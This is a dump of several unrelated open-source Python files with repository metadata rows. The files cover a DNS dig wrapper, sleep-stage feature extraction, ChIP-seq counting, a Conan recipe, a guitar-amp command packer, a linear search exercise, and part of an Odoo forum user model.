] | 9,317 | 2016-08-07T19:00:51.000Z | 2022-03-31T21:56:04.000Z | Packs/Dig/Scripts/Dig/Dig.py | diCagri/content | c532c50b213e6dddb8ae6a378d6d09198e08fc9f | [
"MIT"
] | 1,297 | 2016-08-04T13:59:00.000Z | 2022-03-31T23:43:06.000Z | import re
import subprocess
import traceback
from typing import Any, Dict
import demistomock as demisto # noqa: F401
from CommonServerPython import * # noqa: F401
''' STANDALONE FUNCTION '''
# Run Dig command on the server and get A record for the specified host
def dig_result(server: str, name: str):
try:
if server:
server = f"@{server}"
dig_output = subprocess.check_output(
['dig', server, name, '+short', '+identify'], stderr=subprocess.STDOUT, universal_newlines=True
)
if not dig_output:
raise ValueError("Couldn't find A record for:\n" + name)
resolved_addresses, dns_server = regex_result(dig_output, reverse_lookup=False)
return {"name": name, "resolvedaddresses": resolved_addresses, "nameserver": dns_server}
else:
dig_output = subprocess.check_output(
['dig', name, '+short', '+identify'], stderr=subprocess.STDOUT, universal_newlines=True
)
if not dig_output:
raise ValueError("Couldn't find A record for:\n" + name)
resolved_addresses, dns_server = regex_result(dig_output, reverse_lookup=False)
return {"name": name, "resolvedaddresses": resolved_addresses, "nameserver": dns_server}
except subprocess.CalledProcessError as e:
return_error(e.output)
# Run Dig command on the server and get PTR record for the specified IP
def reverse_dig_result(server: str, name: str):
try:
if server:
server = f"@{server}"
dig_output = subprocess.check_output(
['dig', server, '+answer', '-x', name, '+short', '+identify'], stderr=subprocess.STDOUT, universal_newlines=True
)
if not dig_output:
raise ValueError("Couldn't find PTR record for:\n" + name)
resolved_addresses, dns_server = regex_result(dig_output, reverse_lookup=True)
return {"name": name, "resolveddomain": resolved_addresses, "nameserver": dns_server}
else:
dig_output = subprocess.check_output(
['dig', '+answer', '-x', name, '+short', '+identify'], stderr=subprocess.STDOUT, universal_newlines=True
)
if not dig_output:
raise ValueError("Couldn't find PTR record for:\n" + name)
resolved_addresses, dns_server = regex_result(dig_output, reverse_lookup=True)
return {"name": name, "resolveddomain": resolved_addresses, "nameserver": dns_server}
except subprocess.CalledProcessError as e:
return_error(e.output)
def regex_result(dig_output: str, reverse_lookup: bool):
# regex phrase to catch a number between 0 to 255
num_0_255 = r'(?:25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9]?[0-9])'
try:
if not reverse_lookup:
regex_results_ip = re.findall(rf'\b(?:{num_0_255}(?:\[\.\]|\.)){{3}}{num_0_255}\b', dig_output)
if not regex_results_ip:
raise ValueError("Couldn't find results:\n")
resolved_addresses = regex_results_ip[::2]
dns_server = regex_results_ip[1]
else:
regex_results_domain = re.findall(
rf'\b^[\S]+|(?:{num_0_255}(?:\[\.\]|\.)){{3}}{num_0_255}\b', dig_output)
if not regex_results_domain:
raise ValueError("Couldn't find results:\n")
resolved_addresses = regex_results_domain[0]
dns_server = regex_results_domain[1]
except Exception as e:
return_error(str(e))
return resolved_addresses, dns_server
''' COMMAND FUNCTION '''
def dig_command(args: Dict[str, Any]) -> CommandResults:
server = args.get('server', None)
name = args.get('name', None)
reverse_lookup = argToBoolean(args.get("reverseLookup"))
if reverse_lookup:
result = reverse_dig_result(server, name)
else:
result = dig_result(server, name)
return CommandResults(
outputs_prefix='digresults',
outputs=result,
ignore_auto_extract=True
)
''' MAIN FUNCTION '''
def main():
try:
return_results(dig_command(demisto.args()))
except Exception as ex:
demisto.error(traceback.format_exc()) # print the traceback
return_error(f'Failed to execute Dig. Error: {str(ex)}')
''' ENTRY POINT '''
if __name__ in ('__main__', '__builtin__', 'builtins'):
main()
| 33.103704 | 128 | 0.620944 | 537 | 4,469 | 4.957169 | 0.221601 | 0.050714 | 0.047333 | 0.049587 | 0.610068 | 0.610068 | 0.610068 | 0.610068 | 0.587528 | 0.587528 | 0 | 0.016319 | 0.259566 | 4,469 | 134 | 129 | 33.350746 | 0.788154 | 0.051242 | 0 | 0.431818 | 0 | 0.011364 | 0.155239 | 0.036214 | 0 | 0 | 0 | 0 | 0 | 1 | 0.056818 | false | 0 | 0.068182 | 0 | 0.193182 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6514dcd90c158534f6e189d0810af735f39e7bb2 | 7,691 | py | Python | crf/feature_ext.py | wadpac/SleepStageClassification | 5b288995e62bbd66faa66bd932b06af8a65f8445 | [
"Apache-2.0"
] | 24 | 2019-04-15T09:18:51.000Z | 2022-03-05T14:09:34.000Z | crf/feature_ext.py | wadpac/SleepStageClassification | 5b288995e62bbd66faa66bd932b06af8a65f8445 | [
"Apache-2.0"
] | 2 | 2021-01-28T01:02:06.000Z | 2021-04-02T06:34:04.000Z | crf/feature_ext.py | wadpac/SleepStageClassification | 5b288995e62bbd66faa66bd932b06af8a65f8445 | [
"Apache-2.0"
] | 11 | 2019-05-30T19:27:39.000Z | 2021-06-19T02:41:53.000Z | import sys,os
import numpy as np
import pandas as pd
import h5py
import math
from scipy.stats import entropy
from collections import Counter
import pickle
# Get Euclidean Norm minus One
def get_ENMO(x,y,z):
enorm = np.sqrt(x*x + y*y + z*z)
ENMO = np.maximum(enorm-1.0, 0.0)
return ENMO
# Get tilt angles
def get_tilt_angles(x,y,z):
angle_x = np.arctan2(x, np.sqrt(y*y + z*z)) * 180.0/math.pi
angle_y = np.arctan2(y, np.sqrt(x*x + z*z)) * 180.0/math.pi
angle_z = np.arctan2(z, np.sqrt(x*x + y*y)) * 180.0/math.pi
return angle_x, angle_y, angle_z
# Get Locomotor Inactivity During Sleep
def get_LIDS(timestamp, ENMO):
df = pd.concat((timestamp, pd.Series(ENMO)), axis=1)
df.columns = ['timestamp','ENMO']
df.set_index('timestamp', inplace=True)
df['ENMO_sub'] = np.where(ENMO < 0.02, 0, ENMO-0.02) # assuming ENMO is in g
ENMO_sub_smooth = df['ENMO_sub'].rolling('600s').sum() # 10-minute rolling sum
df['LIDS_unfiltered'] = 100.0 / (ENMO_sub_smooth + 1.0)
LIDS = df['LIDS_unfiltered'].rolling('1800s').mean().values # 30-minute rolling average
return LIDS
def compute_entropy(df, bins=20):
hist, bin_edges = np.histogram(df, bins=bins)
p = hist/float(hist.sum())
ent = entropy(p)
return ent
# Aggregate statistics of features over a given time interval
def get_stats(timestamp, feature, token_interval):
feat_df = pd.DataFrame(data={'timestamp':timestamp, 'feature':feature})
feat_df.set_index('timestamp', inplace=True)
feat_mean = feat_df.resample(str(token_interval)+'S').mean()
feat_std = feat_df.resample(str(token_interval)+'S').std()
feat_min = feat_df.resample(str(token_interval)+'S').min()
feat_max = feat_df.resample(str(token_interval)+'S').max()
feat_mad = feat_df.resample(str(token_interval)+'S').apply(pd.DataFrame.mad)
feat_ent1 = feat_df.resample(str(token_interval)+'S').apply(compute_entropy, bins=20)
feat_ent2 = feat_df.resample(str(token_interval)+'S').apply(compute_entropy, bins=200)
stats = np.vstack((feat_mean['feature'], feat_std['feature'], feat_min['feature'],
feat_max['feature'], feat_mad['feature'], feat_ent1['feature'],
feat_ent2['feature'])).T
return stats
def get_categ(df, default='NaN'):
ctr = Counter(df)
for key in ctr:
ctr[key] = ctr[key]/float(len(df))
dom_categ = ctr.most_common()[0]
if dom_categ[1] >= 0.7: # If a category occurs more than 70% of time interval, mark that as dominant category
dom_categ = dom_categ[0]
else:
dom_categ = default
return dom_categ
def get_dominant_categ(timestamp, categ, token_interval, default='NaN'):
categ_df = pd.DataFrame(data={'timestamp':timestamp, 'category':categ})
categ_df.set_index('timestamp', inplace=True)
dom_categ = categ_df.resample(str(token_interval)+'S').apply(get_categ, default=default)
return np.array(dom_categ['category'])
# Get sequence labels in BIEO format - Beginning, Inside, End, Outside
def get_sequential_label(labels, nonwear, states):
# Initialize all labels as 'O'
seq_labels = ['O'] * len(labels)
# Rename first and last labels of the sequence
if labels[0] in states:
seq_labels[0] = 'B-' + labels[0]
if labels[-1] in states:
seq_labels[-1] = 'E-' + labels[-1]
# Rename all other labels based on their previous and next labels
for i in range(1,len(labels)-1):
# If nonwear, retain label as 'O'
if nonwear[i] is True or labels[i] not in states:
continue
# Label beginning of state
if labels[i] != labels[i-1]:
seq_labels[i] = 'B-' + labels[i]
else: # Inside a state
seq_labels[i] = 'I-' + labels[i]
# Label end of state
if labels[i] != labels[i+1]:
seq_labels[i] = 'E-' + labels[i]
return seq_labels
def convert2seq(features, labels, n_seq_tokens=10, user=None, position=None, dataset=None):
sequences = []
ntokens = len(labels)
columns = ['ENMO_mean','ENMO_std','ENMO_min','ENMO_max','ENMO_mad','ENMO_entropy1','ENMO_entropy2',
'angz_mean','angz_std','angz_min','angz_max','angz_mad','angz_entropy1','angz_entropy2',
'LIDS_mean','LIDS_std','LIDS_min','LIDS_max','LIDS_mad','LIDS_entropy1','LIDS_entropy2']
for st_idx in range(0,ntokens,n_seq_tokens):
end_idx = min(ntokens, st_idx+n_seq_tokens)
if (end_idx-st_idx) < (n_seq_tokens//2): # Discard last sequence if too short
continue
lbl_ctr = Counter(labels[st_idx:end_idx]).most_common()
lbl_ctr = [(lbl,float(val)/n_seq_tokens) for lbl,val in lbl_ctr]
# Discard sequences which are atleast 60% or more of 'O'
if lbl_ctr[0][0] == 'O' and lbl_ctr[0][1] >= 0.6:
continue
else:
feat_df = pd.DataFrame(features[st_idx:end_idx], columns=columns)
feat = list(feat_df.T.to_dict().values())
lbl = labels[st_idx:end_idx]
sequences.append({'features': feat, 'labels': lbl, 'user': user, 'position': position, 'dataset': dataset})
return sequences
def main(argv):
indir = argv[0]
token_interval = int(argv[1]) # Time interval in seconds for tokens in a seq
num_seq_tokens = int(argv[2]) # Number of tokens in a sequence
outdir = argv[3]
outdir = os.path.join(outdir, 'seq_'+str(num_seq_tokens)+'tok_'+str(token_interval)+'sec')
if not os.path.exists(outdir):
os.makedirs(outdir)
# Sleep states
states = ['Wake','NREM 1','NREM 2','NREM 3','REM']
files = os.listdir(indir)
for idx,fname in enumerate(files):
print('Processing ' + fname)
fh = h5py.File(os.path.join(indir,fname), 'r')
x = np.array(fh['X'])
y = np.array(fh['Y'])
z = np.array(fh['Z'])
timestamp = pd.Series(fh['DateTime']).apply(lambda x: x.decode('utf8'))
timestamp = pd.to_datetime(timestamp, format='%Y-%m-%d %H:%M:%S.%f')
# Get ENMO and acceleration angles
ENMO = get_ENMO(x,y,z)
angle_x, angle_y, angle_z = get_tilt_angles(x,y,z)
# Get LIDS (Locomotor Inactivity During Sleep)
LIDS = get_LIDS(timestamp, ENMO)
# Get statistics of features for given time intervals
ENMO_stats = get_stats(timestamp, ENMO, token_interval)
angle_z_stats = get_stats(timestamp, angle_z, token_interval)
LIDS_stats = get_stats(timestamp, LIDS, token_interval)
feat = np.hstack((ENMO_stats, angle_z_stats, LIDS_stats))
# Get nonwear for each interval
nonwear = np.array(fh['Nonwear'])
nonwear_agg = get_dominant_categ(timestamp, nonwear, token_interval, default=True)
# Standardize label names for both datasets
# Get label for each interval
label = np.array([x.decode('utf8') for x in np.array(fh['SleepState'])], dtype=object)
label[label == 'W'] = 'Wake'
label[label == 'N1'] = 'NREM 1'
label[label == 'N2'] = 'NREM 2'
label[label == 'N3'] = 'NREM 3'
label[label == 'R'] = 'REM'
label_agg = get_dominant_categ(timestamp, label, token_interval)
# Get sequence labels for the user
seq_label = get_sequential_label(label_agg, nonwear_agg, states)
# Uncomment for PSGNewcastle2015 data
user = fname.split('_')[0]
position = fname.split('_')[1]
dataset = 'Newcastle'
# # Uncomment for UPenn_Axivity data
# user = fname.split('.h5')[0][-4:]
# position = 'NaN'
# dataset = 'UPenn'
# Break up data into sequences of specified number of non-overlapping tokens
# If over 70% of sequence is 'O', exclude that sequence
sequences = convert2seq(feat, seq_label, n_seq_tokens=num_seq_tokens, user=user, position=position, dataset=dataset)
pickle.dump(sequences, open(os.path.join(outdir,fname.split('.h5')[0]+'.pkl'),'wb'))
print(len(sequences))
if __name__ == '__main__':
main(sys.argv[1:])
| 40.478947 | 120 | 0.672084 | 1,189 | 7,691 | 4.183347 | 0.226241 | 0.044431 | 0.028951 | 0.028951 | 0.175915 | 0.146562 | 0.089264 | 0.042622 | 0.035384 | 0.035384 | 0 | 0.019502 | 0.179951 | 7,691 | 189 | 121 | 40.693122 | 0.769145 | 0.171889 | 0 | 0.043165 | 0 | 0 | 0.096351 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071942 | false | 0 | 0.057554 | 0 | 0.194245 | 0.014388 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
651645a6f5373edf603bb785090e306dd5fe8a3d | 1,318 | py | Python | ChIP_counts.py | kaclark/DHS_intergenic_analysis | 5ae1dc1c257ae9dc0e001e07402bebd8e31f0f60 | [
"MIT"
] | null | null | null | ChIP_counts.py | kaclark/DHS_intergenic_analysis | 5ae1dc1c257ae9dc0e001e07402bebd8e31f0f60 | [
"MIT"
] | null | null | null | ChIP_counts.py | kaclark/DHS_intergenic_analysis | 5ae1dc1c257ae9dc0e001e07402bebd8e31f0f60 | [
"MIT"
] | null | null | null | import pandas as pd
DHS_ids = pd.read_csv("./data/mm10_data/DHSs/DHS_ids.bed", sep='\t', header=None, index_col=False)
all_ids = []
for row in DHS_ids[0]:
all_ids.append(row)
ChIP_data = ["H3K27ac", "H3K4me3", "Nanog", "Oct4", "Sox2"]
for antibody in ChIP_data:
print("Beginning count of " + antibody + "data in DHSs")
chro = []
start = []
end = []
ids = []
direct ="data/mm10_data/ChIP/"
path = direct + antibody + ".bed"
data = pd.read_csv(path, sep='\t', header=None, index_col=False)
for row in data[0]:
chro.append(row)
for row in data[1]:
start.append(row)
for row in data[2]:
end.append(row)
for x in range(len(chro)):
ids.append(str(chro[x])+ ":" + str(start[x]) + "-" + str(end[x]))
seen = []
freq_dict = {}
export_data = []
for dhs in ids:
if dhs not in seen:
seen.append(dhs)
freq_dict[dhs] = 1
else:
freq_dict[dhs] += 1
for dhs in freq_dict.keys():
export_data.append([dhs, freq_dict[dhs]])
for dhs in all_ids:
if dhs not in ids:
export_data.append([dhs, 0])
export = pd.DataFrame(export_data)
export_path = direct + antibody + "_counts.csv"
export.to_csv(export_path, index=False, header=False)
| 25.843137 | 98 | 0.575873 | 195 | 1,318 | 3.753846 | 0.297436 | 0.054645 | 0.043716 | 0.04918 | 0.221311 | 0.131148 | 0.07377 | 0 | 0 | 0 | 0 | 0.019812 | 0.272382 | 1,318 | 50 | 99 | 26.36 | 0.743483 | 0 | 0 | 0 | 0 | 0 | 0.10038 | 0.025095 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.025 | 0 | 0.025 | 0.025 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
65178447d39aa1d04fd14df890c09c3895321d99 | 994 | py | Python | conanfile.py | DBrutski/2out | 28aecd80496250641672638c9ab2cfdc9e5df36d | [
"MIT"
] | null | null | null | conanfile.py | DBrutski/2out | 28aecd80496250641672638c9ab2cfdc9e5df36d | [
"MIT"
] | null | null | null | conanfile.py | DBrutski/2out | 28aecd80496250641672638c9ab2cfdc9e5df36d | [
"MIT"
] | null | null | null | from conans import ConanFile, CMake, tools
class OoutConan(ConanFile):
name = "2out"
version = "0.8"
description = "Object oriented unit testing framework"
license = "MIT"
url = "https://github.com/DronMDF/2out"
settings = "os", "compiler", "build_type", "arch"
options = {"shared": [True, False]}
default_options = "shared=False"
generators = "cmake"
def source(self):
self.run("git clone https://github.com/DronMDF/2out.git .")
self.run("git checkout v%s" % self.version)
tools.replace_in_file(
"CMakeLists.txt",
"ENABLE_TESTING()",
'\n'.join((
"include(${CMAKE_BINARY_DIR}/conanbuildinfo.cmake)",
"conan_basic_setup()",
"ENABLE_TESTING()"
))
)
def build(self):
cmake = CMake(self)
cmake.configure()
cmake.build()
def package(self):
self.copy("*.h", dst="include/2out", src="2out")
self.copy("*.so", dst="lib", keep_path=False)
self.copy("*.a", dst="lib", keep_path=False)
def package_info(self):
self.cpp_info.libs = ["2out"]
| 24.85 | 61 | 0.660966 | 132 | 994 | 4.871212 | 0.575758 | 0.037325 | 0.043546 | 0.065319 | 0.136858 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009501 | 0.152918 | 994 | 39 | 62 | 25.487179 | 0.754157 | 0 | 0 | 0 | 0 | 0 | 0.343058 | 0.049296 | 0 | 0 | 0 | 0 | 0 | 1 | 0.121212 | false | 0 | 0.030303 | 0 | 0.454545 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
651a096d0289a3b8f9af99d7cb11375cc762d8b0 | 6,527 | py | Python | SparkCommander/SparkLib01.py | paulhamsh/Spark-Parser | bd6e12a2b41cadfc6e26dfd2b68061ffdc21da42 | [
"Apache-2.0"
] | 18 | 2020-12-08T17:18:04.000Z | 2022-01-15T09:42:03.000Z | SparkCommander/SparkLib01.py | paulhamsh/Spark-Parser | bd6e12a2b41cadfc6e26dfd2b68061ffdc21da42 | [
"Apache-2.0"
] | null | null | null | SparkCommander/SparkLib01.py | paulhamsh/Spark-Parser | bd6e12a2b41cadfc6e26dfd2b68061ffdc21da42 | [
"Apache-2.0"
] | 2 | 2020-12-16T07:22:56.000Z | 2021-01-31T10:28:44.000Z | ########
#
# Spark Lib
#
# Program to package commands to send to Positive Grid Spark
#
# See https://github.com/paulhamsh/Spark-Parser
#### PRESETS ####
import struct
block_header = b'\x01\xfe\x00\x00\x53\xfe'
size = 33 # could be anything, will be replaced
block_filler = b'\x00\x00\x00\x00\x00\x00\x00\x00\x00'
chunk_header = b'\xf0\x01\x3a\x15'
this_chunk = 0
max_size = 0xad
######## Helper functions to package a command for the Spark (handles the 'format bytes'
def pack_header(cmd, sub_cmd, multi):
global snd_data, tmp_data, format_byte, this_chunk, this_cmd, this_sub_cmd
global pos, header, block_pos, final_data, multi_chunk
header = block_header + bytes([size]) + block_filler + chunk_header + bytes([cmd]) + bytes([sub_cmd])
snd_data = header
pos = 1
block_pos = 0x10 + 0x06 + 1
this_cmd = cmd
this_sub_cmd = sub_cmd
multi_chunk = multi
format_byte = 0
tmp_data = b''
if multi_chunk:
format_byte = 4 # I don't know why - seems wrong but it is CRITICAL this is 4 except for the non-final chunks
tmp_data += b'\x03' + bytes([this_chunk]) + b'\x00' # mutli-chunk header - assumes 3 chunks
pos += 3
block_pos += 3
def end_chunk():
global snd_data, tmp_data, format_byte, pos, block_pos
# add_pack (b'\xf7', False)
tmp_data += b'\xf7'
pos += 1
block_pos += 1
# if pos == 8:
# snd_data += bytes([format_byte])
# snd_data += tmp_data
# format_byte = 0
# pos = 1
# block_pos += 1
# tmp_data = b''
if len(tmp_data) == 1:
snd_data += tmp_data # last byte is 0xf7 so we don't need a format byte
elif len(tmp_data) > 1:
snd_data += bytes([format_byte])
snd_data += tmp_data
def start_packing (cmd, sub_cmd, multi = False):
global final_data, this_chunk
final_data = []
this_chunk = 0
pack_header (cmd, sub_cmd, multi)
def add_pack (msg, setformat = True):
global snd_data, tmp_data, pos, format_byte, block_pos, this_chunk, multi_chunk, final_data
if setformat == True:
format_byte |= (1 << (pos-1))
for i in range (0, len(msg)):
tmp_data += bytes([msg[i]])
pos += 1
block_pos += 1
if pos == 8:
snd_data += bytes([format_byte])
snd_data += tmp_data
format_byte = 0
pos = 1
block_pos += 1
tmp_data = b''
if (block_pos == max_size - 1) and multi_chunk:
end_chunk ()
this_chunk += 1
size = len(snd_data)
end_msg = snd_data[0:6] + bytes([size]) + snd_data[7:]
final_data.append(end_msg)
pack_header(this_cmd, this_sub_cmd, True)
def end_pack():
global snd_data, tmp_data, pos, format_byte, final_data, multi_chunk
end_chunk()
# update the block size field
block_size = len(snd_data)
end_msg = snd_data[0:6] + bytes([block_size]) + snd_data[7:]
final_data.append(end_msg)
# update chunk size and counts for all chunks
if multi_chunk:
num_chunks = len (final_data)
for m in range(0, num_chunks):
tmp_msg = final_data[m]
format1 = tmp_msg[22]
if m == num_chunks - 1: # last chunk
s1 = block_size - 16 - 6 - 4 - 1
chunk_size = s1 - int ((s1+2) / 8)
format1 = format1 & 0xfb # very odd it sometimes doesn't like a 4 in the first format for the final chunk
else:
chunk_size = 0
end_msg = tmp_msg[0:22] + bytes([format1]) + bytes ([num_chunks]) + bytes ([m]) + bytes([chunk_size]) + tmp_msg[26:]
final_data[m] = end_msg
return final_data
######## Helper functions for packing data types
def add_prefixed_string(pack_str):
add_pack ([len(pack_str)], False)
add_pack (bytes([len(pack_str)+0x20]) + bytes(pack_str, 'utf-8'))
def add_string(pack_str):
add_pack (bytes([len(pack_str)+0x20]) + bytes(pack_str, 'utf-8'))
def add_long_string(pack_str):
add_pack (b'\x59')
add_pack (bytes([len(pack_str)]) + bytes(pack_str, 'utf-8'), False)
def add_float(flt):
bytes_val = struct.pack(">f", flt)
add_pack (b'\x4a' + bytes_val)
def add_onoff (onoff):
if onoff == "On":
b = b'\x43'
else:
b = b'\x42'
add_pack(b)
######## Functions to package a command for the Spark
def pack_parameter_change (pedal, param, val):
cmd = 0x01
sub_cmd = 0x04
start_packing (cmd, sub_cmd)
add_prefixed_string (pedal)
add_pack ([param])
add_float(val)
return end_pack ()
def pack_pedal_change (pedal1, pedal2):
cmd = 0x01
sub_cmd = 0x06
start_packing (cmd, sub_cmd)
add_prefixed_string (pedal1)
add_prefixed_string (pedal2)
return end_pack ()
def pack_hardware_preset_change (preset_num): # preset_num is 0 to 3
cmd = 0x01
sub_cmd = 0x38
start_packing (cmd, sub_cmd)
add_pack ([0], False)
add_pack ([preset_num], False) ##### CHANGED
return end_pack ()
def pack_turn_pedal_onoff (pedal, onoff):
cmd = 0x01
sub_cmd = 0x15
start_packing (cmd, sub_cmd)
add_prefixed_string (pedal)
add_onoff (onoff)
return end_pack ()
def pack_preset (preset):
global this_chunk, tmp_data, snd_data
cmd = 0x01
sub_cmd = 0x01
this_chunk = 0
start_packing (cmd, sub_cmd, True)
add_pack (b'\x00\x7f', False)
add_long_string (preset["UUID"])
add_string (preset["Name"])
add_string (preset["Version"])
descr = preset["Description"]
if len (descr) > 31:
add_long_string (descr)
else:
add_string (descr)
add_string (preset["Icon"])
add_float (preset["BPM"])
add_pack (bytes([0x10 + 7])) # always 7 pedals
for i in range (0, 7):
add_string (preset["Pedals"][i]["Name"])
add_onoff (preset["Pedals"][i]["OnOff"])
num_p = len(preset["Pedals"][i]["Parameters"])
add_pack (bytes([num_p + 0x10]))
for p in range (0, num_p):
add_pack (bytes([p]), False)
add_pack (b'\x11')
add_float (preset["Pedals"][i]["Parameters"][p])
add_pack (bytes([preset["End Filler"]]))
return end_pack ()
| 27.540084 | 129 | 0.581431 | 931 | 6,527 | 3.828142 | 0.18797 | 0.037318 | 0.022727 | 0.031425 | 0.329125 | 0.259259 | 0.224747 | 0.207912 | 0.150393 | 0.121773 | 0 | 0.03979 | 0.299219 | 6,527 | 236 | 130 | 27.65678 | 0.739397 | 0.140034 | 0 | 0.294872 | 0 | 0 | 0.041682 | 0.010826 | 0 | 0 | 0.012992 | 0 | 0 | 1 | 0.096154 | false | 0 | 0.00641 | 0 | 0.141026 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
651b4cd98598dd151533e039b51ab26fcfefc930 | 961 | py | Python | Data Structures and Algorithms/Searching Algorithms/Linear Search Algorithms/LinearSearchUserInput.py | akkik04/Python-DataStructures-and-Algorithms | 8db63173218e5a9205dbb325935c71fec93b695c | [
"MIT"
] | 1 | 2022-01-22T18:19:07.000Z | 2022-01-22T18:19:07.000Z | Data Structures and Algorithms/Searching Algorithms/Linear Search Algorithms/LinearSearchUserInput.py | akkik04/Python-DataStructures-and-Algorithms | 8db63173218e5a9205dbb325935c71fec93b695c | [
"MIT"
] | null | null | null | Data Structures and Algorithms/Searching Algorithms/Linear Search Algorithms/LinearSearchUserInput.py | akkik04/Python-DataStructures-and-Algorithms | 8db63173218e5a9205dbb325935c71fec93b695c | [
"MIT"
] | null | null | null | # AKSHITH K
# LINEAR SEARCH IMPLEMENTED IN PYTHON WITH USER INPUT.
# creating a function to search for the desired element in the array.
def linear_search(arr, desired_element):
# creating a for-loop to iterate for the elements in the array.
for i in range(len(arr)):
# creating a nested if-statement to check if the element is found at an index in the array.
if arr[i] == desired_element:
# returning the value of the index if desired element is present at it.
return 'The element is present at index ' + str(i)
# returning 'None' if the element is not found in the array.
return None
# receiving input for the array and desired element.
arr = list(map(int, input().rstrip().split()))
desired_element = int(input())
# code to print the final output, which indicates if the element is found at an index.
result = linear_search(arr, desired_element)
print(result)
| 36.961538 | 100 | 0.681582 | 147 | 961 | 4.414966 | 0.401361 | 0.151002 | 0.061633 | 0.064715 | 0.175655 | 0.086287 | 0.086287 | 0.086287 | 0 | 0 | 0 | 0 | 0.24974 | 961 | 25 | 101 | 38.44 | 0.900139 | 0.57128 | 0 | 0 | 0 | 0 | 0.084881 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0 | 0 | 0.333333 | 0.111111 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
651be986c89ec9c593d35b577a7a61664b061692 | 5,198 | py | Python | web/addons/website_forum/models/res_users.py | diogocs1/comps | 63df07f6cf21c41e4527c06e2d0499f23f4322e7 | [
"Apache-2.0"
] | 1 | 2019-12-29T11:53:56.000Z | 2019-12-29T11:53:56.000Z | odoo/addons/website_forum/models/res_users.py | tuanquanghpvn/odoo8-tutorial | 52d25f1ca5f233c431cb9d3b24b79c3b4fb5127e | [
"MIT"
] | null | null | null | odoo/addons/website_forum/models/res_users.py | tuanquanghpvn/odoo8-tutorial | 52d25f1ca5f233c431cb9d3b24b79c3b4fb5127e | [
"MIT"
] | 3 | 2020-10-08T14:42:10.000Z | 2022-01-28T14:12:29.000Z | # -*- coding: utf-8 -*-
from datetime import datetime
from urllib import urlencode
import hashlib
from openerp import SUPERUSER_ID
from openerp.osv import osv, fields
class Users(osv.Model):
_inherit = 'res.users'
def __init__(self, pool, cr):
init_res = super(Users, self).__init__(pool, cr)
self.SELF_WRITEABLE_FIELDS = list(
set(
self.SELF_WRITEABLE_FIELDS +
['country_id', 'city', 'website', 'website_description', 'website_published']))
return init_res
def _get_user_badge_level(self, cr, uid, ids, name, args, context=None):
"""Return total badge per level of users"""
result = dict.fromkeys(ids, False)
badge_user_obj = self.pool['gamification.badge.user']
for id in ids:
result[id] = {
'gold_badge': badge_user_obj.search(cr, uid, [('badge_id.level', '=', 'gold'), ('user_id', '=', id)], context=context, count=True),
'silver_badge': badge_user_obj.search(cr, uid, [('badge_id.level', '=', 'silver'), ('user_id', '=', id)], context=context, count=True),
'bronze_badge': badge_user_obj.search(cr, uid, [('badge_id.level', '=', 'bronze'), ('user_id', '=', id)], context=context, count=True),
}
return result
_columns = {
'create_date': fields.datetime('Create Date', select=True, readonly=True),
'karma': fields.integer('Karma'),
'badge_ids': fields.one2many('gamification.badge.user', 'user_id', 'Badges'),
'gold_badge': fields.function(_get_user_badge_level, string="Number of gold badges", type='integer', multi='badge_level'),
'silver_badge': fields.function(_get_user_badge_level, string="Number of silver badges", type='integer', multi='badge_level'),
'bronze_badge': fields.function(_get_user_badge_level, string="Number of bronze badges", type='integer', multi='badge_level'),
}
_defaults = {
'karma': 0,
}
def _generate_forum_token(self, cr, uid, user_id, email):
"""Return a token for email validation. This token is valid for the day
and is a hash based on a (secret) uuid generated by the forum module,
the user_id, the email and currently the day (to be updated if necessary). """
forum_uuid = self.pool.get('ir.config_parameter').get_param(cr, SUPERUSER_ID, 'website_forum.uuid')
return hashlib.sha256('%s-%s-%s-%s' % (
datetime.now().replace(hour=0, minute=0, second=0, microsecond=0),
forum_uuid,
user_id,
email)).hexdigest()
def send_forum_validation_email(self, cr, uid, user_id, forum_id=None, context=None):
user = self.pool['res.users'].browse(cr, uid, user_id, context=context)
token = self._generate_forum_token(cr, uid, user_id, user.email)
activation_template_id = self.pool['ir.model.data'].xmlid_to_res_id(cr, uid, 'website_forum.validation_email')
if activation_template_id:
params = {
'token': token,
'id': user_id,
'email': user.email}
if forum_id:
params['forum_id'] = forum_id
base_url = self.pool['ir.config_parameter'].get_param(cr, uid, 'web.base.url')
token_url = base_url + '/forum/validate_email?%s' % urlencode(params)
tpl_ctx = dict(context, token_url=token_url)
